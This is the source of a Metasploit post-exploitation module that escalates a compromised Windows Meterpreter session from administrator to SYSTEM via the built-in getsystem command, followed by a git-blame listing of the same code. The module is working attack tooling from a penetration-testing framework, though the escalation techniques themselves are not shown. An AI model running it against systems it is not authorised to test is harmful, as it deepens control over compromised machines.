metasploit-framework/modules/post/windows/escalate/getsystem.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'metasm'


class MetasploitModule < Msf::Post

  include Msf::Post::Windows::Priv

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Escalate Get System via Administrator',
      'Description'   => %q{
          This module uses the builtin 'getsystem' command to escalate
        the current session to the SYSTEM account from an administrator
        user account.
      },
      'License'       => MSF_LICENSE,
      'Author'        => 'hdm',
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options([
      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-4), otherwise try them all", 0])
    ], self.class)

  end

  def unsupported
    print_error("This platform is not supported with this script!")
    raise Rex::Script::Completed
  end

  def run

    technique = datastore['TECHNIQUE'].to_i

    unsupported if client.platform !~ /windows/i

    if is_system?
      print_good("This session already has SYSTEM privileges")
      return
    end

    begin
      result = client.priv.getsystem(technique)
      print_good("Obtained SYSTEM via technique #{result[1]}")
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Failed to obtain SYSTEM access")
    end
  end

end
Add a getsystem post module for automation 2011-11-11 22:19:49 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add a getsystem post module for automation 2011-11-11 22:19:49 +00:00			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'metasm'`


use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Post`
Add a getsystem post module for automation 2011-11-11 22:19:49 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Post::Windows::Priv`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Windows Escalate Get System via Administrator',`
			`'Description' => %q{`
			`This module uses the builtin 'getsystem' command to escalate`
			`the current session to the SYSTEM account from an administrator`
			`user account.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => 'hdm',`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`

			`register_options([`
			`OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-4), otherwise try them all", 0])`
			`], self.class)`

			`end`

			`def unsupported`
Rejig platform to use windows instead of win32/win64 2016-10-14 00:10:04 +00:00			`print_error("This platform is not supported with this script!")`
Retab modules 2013-08-30 21:28:54 +00:00			`raise Rex::Script::Completed`
			`end`

			`def run`

handle exception in getsystem module 2016-08-16 04:51:05 +00:00			`technique = datastore['TECHNIQUE'].to_i`
Retab modules 2013-08-30 21:28:54 +00:00
Rejig platform to use windows instead of win32/win64 2016-10-14 00:10:04 +00:00			`unsupported if client.platform !~ /windows/i`
Retab modules 2013-08-30 21:28:54 +00:00
			`if is_system?`
			`print_good("This session already has SYSTEM privileges")`
			`return`
			`end`

handle exception in getsystem module 2016-08-16 04:51:05 +00:00			`begin`
			`result = client.priv.getsystem(technique)`
			`print_good("Obtained SYSTEM via technique #{result[1]}")`
			`rescue Rex::Post::Meterpreter::RequestError => e`
			`print_error("Failed to obtain SYSTEM access")`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Add a getsystem post module for automation 2011-11-11 22:19:49 +00:00
			`end`